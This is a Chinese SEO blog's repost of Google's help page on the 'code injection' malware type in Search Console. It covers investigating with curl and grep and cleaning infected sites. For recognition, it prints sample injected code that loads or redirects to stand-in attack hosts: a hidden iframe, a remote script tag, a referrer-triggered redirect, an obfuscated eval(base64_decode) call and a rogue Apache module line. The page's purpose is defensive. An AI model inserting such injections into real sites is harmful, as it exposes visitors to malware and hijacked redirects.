Google恶意软件感染类型:代码注入

- Google官方教程+马慧SEO编辑 - 阅 98

Google搜索站长后台( Google Search Console)会检测网站是否存在“安全性错误”并会给予提醒。

今天,小小课堂网为大家带来的是转自谷歌官方的《Google恶意软件感染类型:代码注入》。希望本次的谷歌seo优化教程对大家有所帮助。

代码注入

一、Google后台提示:代码注入

如果 Google Search Console 中有网页标记为“代码注入”这种恶意软件感染类型,这表示什么?

这表示您网站上的网页已被篡改并含有恶意代码,例如指向恶意软件攻击性网站的 iframe。

要了解关于恶意软件的更多常规信息,请参阅评估受破坏程度(遭恶意软件入侵)。

二、如何调查“代码注入”恶意软件类型?

首先,避免使用浏览器来查看您网站上受感染的网页。因为恶意软件通常会利用浏览器漏洞进行传播,在浏览器中打开受感染的恶意软件网页可能会损害您的计算机。

不妨考虑通过使用 cURL 或 Wget 发起 HTTP 请求(例如,抓取网页)来确认相关行为。这些免费提供的工具有助于诊断重定向行为,而且您还可以灵活地在其中加入引荐来源网址或用户代理信息。通过只向使用特定用户代理或来自特定引荐来源网址的用户提供恶意内容,黑客可以将更多的“真实用户”作为目标,并可躲避网站所有者和恶意软件扫描工具的检测(您的网站必须处于在线状态才能使用这些工具)。

例如:

$curl -v –referer <referer-field> –user-agent “Mozilla/5.0 (

Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko)

Chrome/12.0.742.112 Safari/534.30” <your-url>

例如

$curl -v –referer “http://www 。 google 。 com” –user-agent “Mozilla/5.0

(Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko)

Chrome/12.0.742.112 Safari/534.30″ http://www 。 example 。 com/page.html

接着,登录您的文件系统。对写入“代码注入”受感染网址的所有资源进行调查。以下列出了一些恶意代码注入示例:

指向攻击性网站的 iframe

<iframe frameborder=”0″ height=”0″ src=”http://<attack-site>/path/file”

style=”display:none” width=”0″></iframe>

从攻击性网站调用并运行脚本的 JavaScript 或其他脚本语言

<script type=’text/javascript’ src=’http://malware-attack-site/js/x55.js’></script>

将浏览器重定向到攻击性网站的脚本

<script>

if (document.referrer.match(/google\.com/)) {

window.location(“http://malware-attack-site/”);

}

</script>

试图躲避检测的迷惑性恶意代码

eval(base64_decode(“aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf”));

旨在随机将有害代码写入其他无害脚本的共享对象文件

#httpd.conf modified by the hacker

LoadModule harmful_module modules/mod_harmful.so

AddModule mod_harmful.c

调查网站上可能存在的所有有害代码。搜索 [iframe] 字样可能有助于找出 iframe 代码。其他实用的关键字还包括“script”、“eval”和“unescape”。例如,在基于 Unix 的系统上:

$grep -irn “iframe” ./ | less

三、如何清理属于“代码注入”恶意软件类型的网站?

当您准备好清理网站(请参阅“针对被黑客入侵的网站的帮助”恢复流程中的第 7 步)后,可以将受影响的文件替换为最近的一个正常备份文件,也可以从各网页以及所有相关的脚本函数和文件中移除相应的代码注入内容。如果您修改了服务器配置文件,可能需要重新启动网络服务器才能使更改生效。

请注意,移除恶意代码并不能修复导致黑客在一开始入侵您网站的潜在漏洞。如果不解决根本问题,您的网站在将来还会再次被入侵。要详细了解如何清理整个网站(而不只是这种恶意软件类型),请参阅针对被黑客入侵的网站的帮助,尤其是第 5 步:评估受破坏程度(遭恶意软件入侵)中的“文件系统受破坏程度评估”。

以上就是小小课堂网为大家带来的是转自谷歌官方的《Google恶意软件感染类型:代码注入》。感谢您的观看。小小课堂网谷歌SEO优化教程。

优质文章推荐:《站外SEO是什么意思?》、《网站快速收录?如何让百度快速收录网站及文章》、《内链优化指南》、《seo见到效果再付费》、《最好的seo学习网站》。

更多相关文章点击聚合页面《预防处理网站被黑》。

本站提供SEO培训、咨询、诊断,详细联系站长,微信(电话):13722793092

如需购买系统的SEO优化、网络推广和网站建设的视频教程(提供一对一指导),联系QQ:2216876660  微信:huowuyan

喜欢记得,点赞,打赏哦。小小课堂网,每天一个SEO原创视频和图文教程,别忘了关注哦。

扫描二维码关注“小小课堂网”

第一时间获取最新教程

二维码

5

本文转载 " https://www.xxkt.org/8230 "

原文地址 " Google站长平台 "

相关文章!

发表评论

电子邮件地址不会被公开。 必填项已用*标注